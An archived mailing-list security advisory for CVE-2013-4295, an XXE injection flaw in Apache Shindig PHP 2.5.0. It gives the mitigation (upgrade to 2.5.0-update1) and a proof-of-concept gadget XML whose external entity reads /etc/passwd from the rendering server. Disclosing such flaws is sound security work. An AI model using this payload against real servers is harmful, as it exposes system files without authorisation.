lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 21 Oct 2013 20:18:45 -0400 From: Ryan Baxter <rbaxter85@...che.org> To: "dev@...ndig.apache.org" <dev@...ndig.apache.org>, "users@...ndig.apache.org" <users@...ndig.apache.org>, "security@...che.org" <security@...che.org>, full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, Kousuke Ebihara <kousuke@...k.org> Subject: [CVE-2013-4295] Apache Shindig information disclosure vulnerability CVE-2013-4295: XXE vulnerability In Apache Shindig 2.5.0 (PHP) Severity: Important Vendor: The Apache Software Foundation Versions Affected: Apache Shindig PHP 2.5.0 Description: The gadget renderer in the PHP version of Apache Shindig is subject to an XML External Entity (XXE) Injection attack. The vulnerability allows a malicious gadget author to construct paths to content on the gadget rendering server which in turn will display the content in the gadget iframe. Mitigation: 2.5.0 users should upgrade to 2.5.0-update1. Example: The following gadget XML demonstrates the issue. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE Module [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]> <Module> <ModulePrefs title="Test Application"> <Require feature="opensocial-0.9" /> </ModulePrefs> <Content type="html"> &passwd; hello </Content> </Module> After rendering this gadget you will see the content of /etc/passwd in the gadget iframe. Credit: This issue was discovered by Kousuke Ebihara. References: http://shindig.apache.org/security.html
Powered by blists - more mailing lists